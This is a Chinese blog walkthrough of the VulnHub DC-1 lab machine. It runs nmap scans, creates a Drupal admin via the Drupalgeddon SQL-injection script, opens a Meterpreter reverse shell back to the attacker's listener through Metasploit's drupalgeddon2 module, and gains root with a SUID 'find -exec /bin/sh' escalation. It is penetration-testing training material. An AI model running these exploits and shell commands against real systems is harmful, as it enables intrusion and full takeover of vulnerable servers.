[vulnhub] DC:1

First Post:

2023-05-27

Last Update:

2023-05-31

Word Count:

2.9k

Read Time:

16 min

简介

vulnhub上DC系列第一台靶机。比较简单。

信息收集

nmap

主机发现，端口扫描，TCP扫描，服务识别，系统探测，脚本漏扫

┌──(kali㉿kali)-[~/vulnhub/DC/1/workSpace]
└─$ sudo nmap -sn 192.168.56.0/24                     
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-27 14:19 CST
Nmap scan report for 192.168.56.1
Host is up (0.00053s latency).
MAC Address: 0A:00:27:00:00:08 (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.000092s latency).
MAC Address: 08:00:27:2E:A1:5A (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.109
Host is up (0.00057s latency).
MAC Address: 08:00:27:5F:F1:0D (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.144
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.31 seconds
                                                                                             
┌──(kali㉿kali)-[~/vulnhub/DC/1/workSpace]
└─$ sudo nmap -p- --min-rate=10000 192.168.56.109
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-27 14:20 CST
Warning: 192.168.56.109 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.56.109
Host is up (0.00030s latency).
Not shown: 40138 filtered tcp ports (no-response), 25393 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
49001/tcp open  nusrp
MAC Address: 08:00:27:5F:F1:0D (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 116.03 seconds
                                                                                             
┌──(kali㉿kali)-[~/vulnhub/DC/1/workSpace]
└─$ sudo nmap -sT -sV -sC -O -p22,80,111,49001 192.168.56.109
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-27 14:22 CST
Nmap scan report for 192.168.56.109
Host is up (0.00088s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 c4d659e6774c227a961660678b42488f (DSA)
|   2048 1182fe534edc5b327f446482757dd0a0 (RSA)
|_  256 3daa985c87afea84b823688db9055fd8 (ECDSA)
80/tcp    open  http    Apache httpd 2.2.22 ((Debian))
|_http-title: Welcome to Drupal Site | Drupal Site
|_http-server-header: Apache/2.2.22 (Debian)
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          37080/udp   status
|   100024  1          47634/udp6  status
|   100024  1          49001/tcp   status
|_  100024  1          53648/tcp6  status
49001/tcp open  status  1 (RPC #100024)
MAC Address: 08:00:27:5F:F1:0D (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.95 seconds
          
          
┌──(kali㉿kali)-[~/vulnhub/DC/1/workSpace]
└─$ sudo nmap --script=vuln 192.168.56.109                   
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-27 14:23 CST
Nmap scan report for 192.168.56.109
Host is up (0.00032s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
| http-enum: 
|   /rss.xml: RSS or Atom feed
|   /robots.txt: Robots file
|   /UPGRADE.txt: Drupal file
|   /INSTALL.txt: Drupal file
|   /INSTALL.mysql.txt: Drupal file
|   /INSTALL.pgsql.txt: Drupal file
|   /: Drupal version 7 
|   /README: Interesting, a readme.
|   /README.txt: Interesting, a readme.
|   /0/: Potentially interesting folder
|_  /user/: Potentially interesting folder
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.109
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.56.109:80/
|     Form id: user-login-form
|     Form action: /node?destination=node
|     
|     Path: http://192.168.56.109:80/user/password
|     Form id: user-pass
|     Form action: /user/password
|     
|     Path: http://192.168.56.109:80/user/register
|     Form id: user-register-form
|     Form action: /user/register
|     
|     Path: http://192.168.56.109:80/node?destination=node
|     Form id: user-login-form
|     Form action: /node?destination=node
|     
|     Path: http://192.168.56.109:80/user
|     Form id: user-login
|     Form action: /user
|     
|     Path: http://192.168.56.109:80/user/
|     Form id: user-login
|_    Form action: /user/
| http-vuln-cve2014-3704: 
|   VULNERABLE:
|   Drupal - pre Auth SQL Injection Vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-3704
|         The expandArguments function in the database abstraction API in
|         Drupal core 7.x before 7.32 does not properly construct prepared
|         statements, which allows remote attackers to conduct SQL injection
|         attacks via an array containing crafted keys.
|           
|     Disclosure date: 2014-10-15
|     References:
|       http://www.securityfocus.com/bid/70595
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3704
|       https://www.drupal.org/SA-CORE-2014-005
|_      https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
111/tcp open  rpcbind
MAC Address: 08:00:27:5F:F1:0D (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 356.20 seconds

可以发现80端口爆大米了，一堆信息，甚至还爆了CVE-2014-3704的漏洞。该挑谁先下手不用多说了。

web渗透

总所周知，在下手之前得先踩点。先识别下网站的技术栈。

┌──(kali㉿kali)-[~/vulnhub/DC/1/workSpace]
└─$ sudo whatweb http://192.168.56.109
[sudo] password for kali: 
http://192.168.56.109 [200 OK] Apache[2.2.22], Content-Language[en], Country[RESERVED][ZZ], Drupal, HTTPServer[Debian Linux][Apache/2.2.22 (Debian)], IP[192.168.56.109], JQuery, MetaGenerator[Drupal 7 (http://drupal.org)], PHP[5.4.45-0+deb7u14], PasswordField[pass], Script[php,text/javascript], Title[Drupal Site], UncommonHeaders[x-generator], X-Powered-By[PHP/5.4.45-0+deb7u14]

发现网站是基于Drupal 7的CMS搭建的。结合之前编号CVE-2014-3704的漏洞，我们打算利用这个CMS的漏洞。

在操作之前，不忘在后台挂个网站目录发现，说不定有啥好东西。（实际上确实可以扫出很多目录和文件，虽然不一定对我们有用）

搜一下公开的漏洞：

┌──(kali㉿kali)-[~/vulnhub/DC/1/workSpace]
└─$ searchsploit Drupal                   
----------------------------------------------------------- ---------------------------------
 Exploit Title                                             |  Path
----------------------------------------------------------- ---------------------------------
Drupal 4.0 - News Message HTML Injection                   | php/webapps/21863.txt
Drupal 4.1/4.2 - Cross-Site Scripting                      | php/webapps/22940.txt
Drupal 4.5.3 < 4.6.1 - Comments PHP Injection              | php/webapps/1088.pl
Drupal 4.7 - 'Attachment mod_mime' Remote Command Executio | php/webapps/1821.php
Drupal 4.x - URL-Encoded Input HTML Injection              | php/webapps/27020.txt
Drupal 5.2 - PHP Zend Hash ation Vector                    | php/webapps/4510.txt
Drupal 5.21/6.16 - Denial of Service                       | php/dos/10826.sh
Drupal 6.15 - Multiple Persistent Cross-Site Scripting Vul | php/webapps/11060.txt
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admi | php/webapps/34992.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Se | php/webapps/44355.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Re | php/webapps/34984.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Re | php/webapps/34993.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote C | php/webapps/35150.php
Drupal 7.12 - Multiple Vulnerabilities                     | php/webapps/18564.txt
Drupal 7.x Module Services - Remote Code Execution         | php/webapps/41564.php
Drupal < 4.7.6 - Post Comments Remote Command Execution    | php/webapps/3313.pl
Drupal < 5.1 - Post Comments Remote Command Execution      | php/webapps/3312.pl
Drupal < 5.22/6.16 - Multiple Vulnerabilities              | php/webapps/33706.txt
Drupal < 7.34 - Denial of Service                          | php/dos/35415.txt
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Cod | php/webapps/44542.txt
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Cod | php/webapps/44557.rb
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddo | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remot | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remot | php/webapps/44448.py
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserial | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execu | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Execution         | php/webapps/46459.py
Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Dis | php/webapps/44501.txt
Drupal avatar_uploader v7.x-1.0-beta8 - Cross Site Scripti | php/webapps/50841.txt
Drupal Module Ajax Checklist 5.x-1.0 - Multiple SQL Inject | php/webapps/32415.txt
Drupal Module CAPTCHA - Security Bypass                    | php/webapps/35335.html
Drupal Module CKEditor 3.0 < 3.6.2 - Persistent EventHandl | php/webapps/18389.txt
Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Per | php/webapps/25493.txt
Drupal Module CODER 2.5 - Remote Command Execution (Metasp | php/webapps/40149.rb
Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execut | php/remote/40144.php
Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-S | php/webapps/35397.txt
Drupal Module Drag & Drop Gallery 6.x-1.5 - 'upload.php' A | php/webapps/37453.php
Drupal Module Embedded Media Field/Media 6.x : Video Flots | php/webapps/35072.txt
Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalati | php/webapps/50361.txt
Drupal Module RESTWS 7.x - PHP Remote Code Execution (Meta | php/remote/40130.rb
Drupal Module Sections - Cross-Site Scripting              | php/webapps/10485.txt
Drupal Module Sections 5.x-1.2/6.x-1.2 - HTML Injection    | php/webapps/33410.txt
----------------------------------------------------------- ---------------------------------
Shellcodes: No Results

其中34992.py写着Add admin，对我们挺有吸引力的。试下怎么样。

漏洞利用

┌──(kali㉿kali)-[~/vulnhub/DC/1/workSpace]
└─$ python2 34992.py -t http://192.168.56.109 -u test -p test

  ______                          __     _______  _______ _____
 |   _  \ .----.--.--.-----.---.-|  |   |   _   ||   _   | _   |
 |.  |   \|   _|  |  |  _  |  _  |  |   |___|   _|___|   |.|   |
 |.  |    |__| |_____|   __|___._|__|      /   |___(__   `-|.  |
 |:  1    /          |__|                 |   |  |:  1   | |:  |
 |::.. . /                                |   |  |::.. . | |::.|
 `------'                                 `---'  `-------' `---'
  _______       __     ___       __            __   __
 |   _   .-----|  |   |   .-----|__.-----.----|  |_|__.-----.-----.
 |   1___|  _  |  |   |.  |     |  |  -__|  __|   _|  |  _  |     |
 |____   |__   |__|   |.  |__|__|  |_____|____|____|__|_____|__|__|
 |:  1   |  |__|      |:  |    |___|
 |::.. . |            |::.|
 `-------'            `---'

                                 Drup4l => 7.0 <= 7.31 Sql-1nj3ct10n
                                              Admin 4cc0unt cr3at0r

                          Discovered by:

                          Stefan  Horst
                         (CVE-2014-3704)

                           Written by:

                         Claudio Viviani

                      http://www.homelab.it

                         info@homelab.it
                     homelabit@protonmail.ch

                 https://www.facebook.com/homelabit
                   https://twitter.com/homelabit
                 https://plus.google.com/+HomelabIt1/
       https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww


[!] VULNERABLE!

[!] Administrator user created!

[*] Login: test
[*] Pass: test
[*] Url: http://192.168.56.109/?q=node&destination=node

发现成功添加并可以成功以管理员身份登录。

drupal-backend

可惜在后台研究了半天，在content区域无论是添加php代码还是上传php文件都会要么被注释掉，要么被重名名。没有什么可以利用的点。

在网上查找资料，发现有大佬说可以在module区域打开php filter模块就可以在block里面嵌入php代码了。

遂尝试，可是block区块还是只有Full HTML、Filtered HTML以及Plain text三个选项可选，嵌入php代码还是无法执行。只能暂时放弃这条路了。

那就看看还有什么别的漏洞能用呗。毕竟之前发现这么多exp。翻找了一下有很多远程命令执行的exp。下了一些直接利用没成，发现还有一些msf上的exp，那我们就试试msf吧。

┌──(kali㉿kali)-[~/vulnhub/DC/1/workSpace]
└─$ sudo msfconsole                                      
[sudo] password for kali: 
                                                  
                          ########                  #
                      #################            #
                   ######################         #
                  #########################      #
                ############################
               ##############################
               ###############################
              ###############################
              ##############################
                              #    ########   #
                 ##        ###        ####   ##
                                      ###   ###
                                    ####   ###
               ####          ##########   ####
               #######################   ####
                 ####################   ####
                  ##################  ####
                    ############      ##
                       ########        ###
                      #########        #####
                    ############      ######
                   ########      #########
                     #####       ########
                       ###       #########
                      ######    ############
                     #######################
                     #   #   ###  #   #   ##
                     ########################
                      ##     ##   ##     ##
                            https://metasploit.com


       =[ metasploit v6.3.16-dev                          ]
+ -- --=[ 2315 exploits - 1208 auxiliary - 412 post       ]
+ -- --=[ 975 payloads - 46 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Metasploit can be configured at startup, see 
msfconsole --help to learn more
Metasploit Documentation: https://docs.metasploit.com/

msf6 > search drupal

Matching Modules
================

   #  Name                                           Disclosure Date  Rank       Check  Description
   -  ----                                           ---------------  ----       -----  -----------
   0  exploit/unix/webapp/drupal_coder_exec          2016-07-13       excellent  Yes    Drupal CODER Module Remote Command Execution                                                      
   1  exploit/unix/webapp/drupal_drupalgeddon2       2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Property Injection                                                
   2  exploit/multi/http/drupal_drupageddon          2014-10-15       excellent  No     Drupal HTTP Parameter Key/Value SQL Injection                                                     
   3  auxiliary/gather/drupal_openid_xxe             2012-10-17       normal     Yes    Drupal OpenID External Entity Injection                                                           
   4  exploit/unix/webapp/drupal_restws_exec         2016-07-13       excellent  Yes    Drupal RESTWS Module Remote PHP Code Execution                                                    
   5  exploit/unix/webapp/drupal_restws_unserialize  2019-02-20       normal     Yes    Drupal RESTful Web Services unserialize() RCE                                                     
   6  auxiliary/scanner/http/drupal_views_user_enum  2010-07-02       normal     Yes    Drupal Views Module Users Enumeration                                                             
   7  exploit/unix/webapp/php_xmlrpc_eval            2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code Execution


Interact with a module by name or index. For example info 7, use 7 or use exploit/unix/webapp/php_xmlrpc_eval                                                                             

msf6 exploit(unix/webapp/drupal_restws_exec) > use 1
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options 

Module options (exploit/unix/webapp/drupal_drupalgeddon2):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   DUMP_OUTPUT  false            no        Dump payload command output
   PHP_FUNC     passthru         yes       PHP function to execute
   Proxies                       no        A proxy chain of format type:host:port[,type:hos
                                           t:port][...]
   RHOSTS       192.168.56.109   yes       The target host(s), see https://docs.metasploit.
                                           com/docs/using-metasploit/basics/using-metasploi
                                           t.html
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /                yes       Path to Drupal install
   VHOST                         no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.56.144   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (PHP In-Memory)



View the full module info with the info, or info -d command.

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit 

[*] Started reverse TCP handler on 192.168.56.144:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Sending stage (39927 bytes) to 192.168.56.109
[*] Meterpreter session 1 opened (192.168.56.144:4444 -> 192.168.56.109:54480) at 2023-05-27 16:10:19 +0800

meterpreter > pwd
/var/www
meterpreter > getuid
Server username: www-data
meterpreter >

我们用了0，4，都没有成功，用了1成功了。

然后此处可以直接shell获取shell或者自己传个反弹shell上去也行。

提权

sudo -l会发现sudo被扣掉了。

查看设置的SUID的二进制文件

find / -type f -perm -u=s -ls 2>/dev/null

发现find本身设置了s位。

直接利用

1 2	`www-data@DC-1:/usr/bin$ ./find . -exec /bin/sh -p \; -quit /bin/sh: 0: Illegal option -p`

-p选项用不了，去掉试试。

www-data@DC-1:/usr/bin$ find . -exec /bin/sh \; -quit     
find . -exec /bin/sh \; -quit
# whoami
whoami
root
# cd ~
cd ~
/bin/sh: 2: cd: can't cd to ~
# cd /root
cd /root
# ls -la
ls -la
total 32
drwx------  4 root root 4096 Feb 28  2019 .
drwxr-xr-x 23 root root 4096 Feb 19  2019 ..
drwx------  2 root root 4096 Feb 19  2019 .aptitude
-rw-------  1 root root   44 Feb 28  2019 .bash_history
-rw-r--r--  1 root root  949 Feb 19  2019 .bashrc
drwxr-xr-x  3 root root 4096 Feb 19  2019 .drush
-rw-r--r--  1 root root  140 Nov 20  2007 .profile
-rw-r--r--  1 root root  173 Feb 19  2019 thefinalflag.txt
# cat thefinalflag.txt
cat thefinalflag.txt
Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7

轻松提权。

≡